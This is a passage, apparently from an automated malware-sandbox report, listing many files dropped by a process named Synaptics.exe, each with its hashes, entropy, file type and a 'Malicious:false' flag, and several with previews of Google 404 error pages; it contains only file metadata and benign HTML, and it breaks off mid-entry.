                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261447699241621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0oDXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9T+pAZewRDK4mW
                                                                                                                                                                    MD5:009824679C6EF3B6DF027DAF3C1989BC
                                                                                                                                                                    SHA1:3A7A55734FBA140E9DEE3198A1CBF3998DE9942E
                                                                                                                                                                    SHA-256:BB93C4AF462B588A56779EB702BA39FA1D886D3CFBF1CC8A1FD801586A936D8B
                                                                                                                                                                    SHA-512:006825879EEB6C899ECAB4B38AD33DB7B8E72C045D9FAACB0BBC7F1FE7AF59E145687D4D6CFCE531F393412AAFE469C00944C3F587D547C3C7F967F3B72DA786
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.258726071012523
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+042rDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+12P+pAZewRDK4mW
                                                                                                                                                                    MD5:4AB18CD9726814601678E932424F23FC
                                                                                                                                                                    SHA1:422996A0661F7750DCEE53B8870F634B69E9F9C0
                                                                                                                                                                    SHA-256:25D0FDF093D21DC394509E2B71A17C84CEEC4385FDC1F6286A8D6F8F576E4E40
                                                                                                                                                                    SHA-512:CC3E8561D158DE3384A4E91D5F8AE8763D830A21AA1ED8168A2EABAEFB70A3101CCDD971163D1E9780E44F7B94D12CA08C5E303ED38532B7326DF53B3A765150
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2508434099332115
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0KSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                                    MD5:EF70640D658EAEF4A87C3DA91B7C6847
                                                                                                                                                                    SHA1:DC2BE09E3F2C852A438B6AB7F04A0C74B283E00B
                                                                                                                                                                    SHA-256:9C7CC382F2A75DC89FDC4191E7867167B34CB7F42DF95F2D8273B457CE6344DB
                                                                                                                                                                    SHA-512:FA3BFAAC229EBCD6095027B4EFC782D69CA8D83A4CF567715CC4CFF147CE28C0368D9C0758AE1334403805F730764721D4AF4F6B2CD1BC54F7587076B5AE5AC8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2586942807733426
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0rNbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                                                    MD5:9A9F06A5758491A28081BFA02E2DB23E
                                                                                                                                                                    SHA1:B9E189D74323EF3BC432F0D31A6E1772B552D0A2
                                                                                                                                                                    SHA-256:6614CBEA783C4C64A7FCCD3C76D355E8610C9F87238D44A3D5D831485E474EC4
                                                                                                                                                                    SHA-512:0F2BA26E4E808ECFEC69B5D4ECF1B208CB35E9724808015A1DF64EFD1670480F296DC2AC34FA922DC89D09B91D205894E0D45D473E49F0145A44624BFD5C5513
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.255722828462531
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0g7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r7+pAZewRDK4mW
                                                                                                                                                                    MD5:12B82D5EE4935405C57E534F143E26BF
                                                                                                                                                                    SHA1:5461ED3731234EE412445220A0CE51114012D750
                                                                                                                                                                    SHA-256:ADFAB9BE61E8151DEDE7091E4D27C013D8CBE6031C8D1E55AD86602F30183B35
                                                                                                                                                                    SHA-512:06807441AB7F00D2747DC86CAC0D4B3FFE6D629D9514AA773D0755BD9A7B729B5DC9EFE8839D362049A36886167530CB0F0BBB34A37D048DA744D4B8C3ADAC8E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.262587616936988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0+NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tN+pAZewRDK4mW
                                                                                                                                                                    MD5:C056B9C34FC42317EA4D540AF9D50D30
                                                                                                                                                                    SHA1:C6FF977F8BA8D453099095BEE49FA36AF9AA3AD3
                                                                                                                                                                    SHA-256:D4737C3E591E1B03ADE79C4672E1AED60BF3CD15B32957EE2D5BF0EC0E02CA5C
                                                                                                                                                                    SHA-512:7DA16AD7A640261FCF831723C61C22D5FDD0ED350BB4413C1F0FB15B20DDAFBA69F4E40007923674E45401E50512CD1CB552106BD3309BBC5467079F43F0F449
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264172967755591
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0dQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sQ+pAZewRDK4mW
                                                                                                                                                                    MD5:693A61881D5999853961FF113C22CC4F
                                                                                                                                                                    SHA1:45E1D7CD88D5053E90DDC6D44C24FD1D3D7B883C
                                                                                                                                                                    SHA-256:37B0527DD14C3C383E52BA82BA45DDD346D865E0CD280347864CB398A8068CA1
                                                                                                                                                                    SHA-512:6621A45E9663E34EC3BB9CEA3E48778F33816A80A0D9226DD4F81DF7213150CD9BD5FACB3840E31E41CD6BD045075F06E5B5FEAA5181EB89783D1DD96B7743C6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.244193108162035
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                                    MD5:0F3AFEB7EC6B3282A24997A8A1AE39B1
                                                                                                                                                                    SHA1:7A58C6D22D635B6ABF28A8C62F85E085312E9971
                                                                                                                                                                    SHA-256:11215D8E5EFEC2935730E6AC289E1C350C49F2F690712E7B32AC76566253024C
                                                                                                                                                                    SHA-512:351C14766DE61D5DB4EE16B056BDFB318EDE7611185FD8A4DA2BD54BD9B388E2149EC3378F9066D63FDA532F1115FC84177604057E5555E41F0D75A232D4DEF1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.252051715120241
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                                    MD5:E46A33BB4FB9308F7EF7CA14D1E8501A
                                                                                                                                                                    SHA1:330294DC13DB5E20B4DAED5E31308975490FAB8B
                                                                                                                                                                    SHA-256:05504DB4B9F2C0677E66C94393002102283F54C9F00783A30542EA5089376205
                                                                                                                                                                    SHA-512:1B263632A62AF11615517A6FA0802C746A92AAE4DAA059661A5051F637AAB8E8E86C2E716EBBA99CC18376C26CBC2FD168A2FC4ADB885A57670BC0A5DF55E577
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.268140631049004
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0RhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kh+pAZewRDK4mW
                                                                                                                                                                    MD5:A28CF63028132CD7E827B5E60EA5ADB4
                                                                                                                                                                    SHA1:19F481E8D0EC86F459BAEFDC48E55225A3915C72
                                                                                                                                                                    SHA-256:C1B86E194A1D5EFAE83F8898A86BC819B5696A033633E9D8C2B6EA0F756A0870
                                                                                                                                                                    SHA-512:6A368C5A2B5B737F9676EB1AAF610D9A22A38DF3B84B215F7166FC3BC2888AEB56E7D877A0F1D9719996C4C5475EB6D8A7D7FFCE84EAC7BDDA3AD8D61265B23C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.275791221413178
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BOWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++OW+pAZewRDK4mW
                                                                                                                                                                    MD5:9B4A0E4D153D9E7E6DEA46695D23E62A
                                                                                                                                                                    SHA1:3EF7A3A3E592C57B4FAA07B21A5A96A2771DD23F
                                                                                                                                                                    SHA-256:206E6BF99B555FFC1BE8037A1249FF91B4D28086C2B599133032238E9F49457C
                                                                                                                                                                    SHA-512:FD606B455614DD60BDA86B85F20417EDFC490A6DCFABB9BAACA3EE9CE078764A6CD71446FE7BCC92B8CD618400C06F299F1094CB2C6B87E42706906218EFCC90
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18387
                                                                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.250526025748348
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                                                    MD5:FF19717213C531E0EE021F816013AC21
                                                                                                                                                                    SHA1:2E8ACF27E57B465A8C15C084ABEC90B94E41AAC9
                                                                                                                                                                    SHA-256:8AA105D4F0A170C082EBE9BB54ACF7AA319643B95AE98E394B07432364B71698
                                                                                                                                                                    SHA-512:5388C4E6E42FC13CF76EFC19A94ECF4EEEC480B51AD9E1DAA5773648C46CA88AF0E9BEDD1998F91902A9F2AAEB5AEBEA7D8E3FB685334C795CC3F4CE9D3813CF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tAKtJO5Kmo-iNiKpyAKdfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.263817067225485
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BuDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++e+pAZewRDK4mW
                                                                                                                                                                    MD5:E7B43C65D1096D4CAB6C669FC2D9489A
                                                                                                                                                                    SHA1:D1CD95BDDF92C86B88B41A8C5B7DF908AAD391F9
                                                                                                                                                                    SHA-256:E7F2E5799F47D8F5B28EB0B3E8E0FA7EAAD870919B2D6E9C901B5657646446B0
                                                                                                                                                                    SHA-512:DC938706961706083C3A892AE82936A2E2B43816EAEEB4473209CD1442063CE649D3F9BF6566B9B839151A20D324D5B936F1730F5265A26E5422EFAB91C1805E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.2566486908350765
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0+dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                                    MD5:43DDE0A9ED85A721AC7E99BEB21E2206
                                                                                                                                                                    SHA1:5141B82A14A60391F1C4E4FCAFDE8632C3696047
                                                                                                                                                                    SHA-256:0BD3E2F86C80244C5B9C160CEAA195B3E5DFF9F3C4EABD3EC1F9B7D114DD99EB
                                                                                                                                                                    SHA-512:4028444007E717296212B25B909BF99227D98F9B9CB45D0951A657839F686C7D27841F3C6A535C01C37E87533F0239228ABF497C199C8C64EA3756FCFC5B0D48
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.251392792078042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+03iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                                                                    MD5:523C3BF1D0486D03E58E822F7DF35C85
                                                                                                                                                                    SHA1:B8081C626B808B8747B5F634C298E6A82FDAC1D9
                                                                                                                                                                    SHA-256:6CA4583327D06B66861DE2A470D16DD3A72AAB9FB5428C12849D359EDB55BDF3
                                                                                                                                                                    SHA-512:37A094F49D26F49916F6503D73888A839C6A9D0DDD8C38E68B0340898A93D9694E81FE8BFC59BA02FAB343EF11AF15846CFE5259D77F4FFDB70E793BACA6BA20
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.253559674386249
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                                                    MD5:ACA3C81615E5B831B415888FA4CA8E83
                                                                                                                                                                    SHA1:F465FB38BEEADC145ECCC64014C1431D6D06285D
                                                                                                                                                                    SHA-256:756021E3011195E950DFC8E2FD4EF8DE76B84AEE37A45BD8237BF40AEEFD43DE
                                                                                                                                                                    SHA-512:EEBB32BEFAE8269ABFAA665D78E1A2E336F6D739E560749C7D5E82D5F402C66501DC7C1336B0E6A90E06E2E5FBCA557F05B57E3AB30EDF08B95A8943EBBB300C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270649448348446
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0LUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                                    MD5:C7991CDE4C7F929AC6054CCA0AD288B7
                                                                                                                                                                    SHA1:4683E42B9FFAFB48316A7F186D960B35985109AF
                                                                                                                                                                    SHA-256:193B6DA46B928365E9768BBA8595628097BC054AEBD7B411DDE233768E9D6F0E
                                                                                                                                                                    SHA-512:8BC0B3C820A3B5218047BC248595F260133596634B524056D8EF59D0A7CB64B800C5294E1C448EB88AC64AD15988D1315955BAE275C6910D4BBA334FD4BF6363
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.258253142766805
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                                                                    MD5:D30874C5DB3654040831053FA06A5112
                                                                                                                                                                    SHA1:A1FF9B25A2B798E945EB253AAB1123952D339044
                                                                                                                                                                    SHA-256:8F3D02A497321EF63C0C8AFEE458D9D8FC55F30765EB42EF5F4B041264EACCC8
                                                                                                                                                                    SHA-512:A91091000980C03739B0632622112BBB87FD3472C337315C26DCD14DA0CD735C723E1726D8C8B160A4495017BAC35A2585D739B17929FC96788FCEDE9C674654
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.264228912449142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0MUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+VU+pAZewRDK4mW
                                                                                                                                                                    MD5:7D1B41E437D697036734D2C4546CD31E
                                                                                                                                                                    SHA1:FE5C732736800605A5BB89C7223B0BAA3DC1912B
                                                                                                                                                                    SHA-256:FA1D467A5C970EBC2A83F2A8A76D159E2591416213C07E94FECB38FC4ECB1CD1
                                                                                                                                                                    SHA-512:E62AF3A2E7A99F245D55B79C72835315982C74D4D1C6587609F35E7F7C5B911833020E47E19D1D80AAF92A0BCC0ACC10E6DC9A3CDEDD6D8C7CF21B51DD306A03
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.261083133892779
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                                                    MD5:014F486DA9F7960C7EFBA278E58CBE10
                                                                                                                                                                    SHA1:BB6FE08C08E1DAD8E25F107827066296ECDD97FA
                                                                                                                                                                    SHA-256:32401B42437751E17B5CC9F78C7381AE32CD5919CA0A5C9707D56768EE97B404
                                                                                                                                                                    SHA-512:B401B3489985420FC29B7BEFC278675BE675F74BA5C72F90C45A6DF1F2C98B29B01A1C5F10E5151FF80DE205AC4A87D8E4EEAAEC82317AFC462B8A567C193DA5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.272226940552205
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0oxDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+txD+pAZewRDK4mW
                                                                                                                                                                    MD5:808857BF8D5CD1F028B67446D0C9EA5E
                                                                                                                                                                    SHA1:F3926FC28404EC19A01BDA89527AF13C6F37230A
                                                                                                                                                                    SHA-256:41CB0CE2FC1DB090E463282FDD0255A7A0F8A414E9C1031209E48AE725358B5A
                                                                                                                                                                    SHA-512:7B7B1877696034EC458892B96E5102A290CB0B34D29454638689AFA6A82CA098B1FC0CE283BBE611E8BF4318249D7AE190698293946E8B8F0E3EC42009AD25C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IKkkCkYAdpM7tO-KJRVypA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.275998834181656
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0T0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+aW+pAZewRDK4mW
                                                                                                                                                                    MD5:A7E01E9E4C9D112C5F1A92BEE4869C93
                                                                                                                                                                    SHA1:C9FB3E510A7C6B518A5397A4FF2E5D9146FD622C
                                                                                                                                                                    SHA-256:659C169700E7283A7EA9D8020505694412772A9A580E932077BE72AF5CC5D1D7
                                                                                                                                                                    SHA-512:A7D29C28DC277939024E9C39F8F31A6B788999C2AD04E5A65FCB61D43DC2EDD3D7BECA6A662A186123C8A10A3CE6F9867AC3982132CE52433096136B0693BE17
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GJDLKo8dHNMbQxZUa0MDJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.270152412607049
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+0q6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N6+pAZewRDK4mW
                                                                                                                                                                    MD5:8A73A966B9E6EA36E46844287019D6FC
                                                                                                                                                                    SHA1:C5EF521DD2351BE71052616090B33DAD5FD3942E
                                                                                                                                                                    SHA-256:8D9021425C1504812D971AB200B044FB597476A56DFEE81864E6683AE74ECD07
                                                                                                                                                                    SHA-512:F2BAAA0A06026D7B3958D43BB26E15C1A33EAF17BB08C12F24FE8DF93C4357038297F3A4857A550FD4EB4D451FCC9EF33A8576C605EED753D932D942A22DC8E6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Pxg3jzeCd6pVHKjq8tQ7wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1652
                                                                                                                                                                    Entropy (8bit):5.24202933730775
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                                                    MD5:85BDD5EE31575B8BB60117AFBF485388
                                                                                                                                                                    SHA1:589566035790ED119A4AABF35DC1AC9AE8B2C90F
                                                                                                                                                                    SHA-256:D1CA0BA2C962766E720CCF78DA3D4E5E238A84681C5F91CAC281844FD206E9F4
